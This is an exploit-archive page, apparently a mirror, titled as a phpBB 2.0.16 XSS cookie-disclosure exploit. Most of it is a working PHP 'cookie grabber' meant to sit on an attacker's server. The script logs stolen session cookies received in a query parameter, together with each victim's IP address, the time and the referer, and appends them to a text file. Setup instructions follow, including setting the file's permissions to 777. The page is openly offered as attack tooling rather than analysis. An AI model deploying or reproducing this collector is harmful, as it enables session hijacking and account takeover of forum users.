[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
# Published : 2005-07-13
# Author : Sjaak Rake
# Previous Title : e107 <= 0.617 XSS Remote Cookie Disclosure Exploit
# Next Title : BlogTorrent <= 0.92 Remote Password Disclosure Exploit
// Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
//rename it to cookies.php and create one new file steal.php and chmod it to 777
# www.Syue.com [2005-07-13]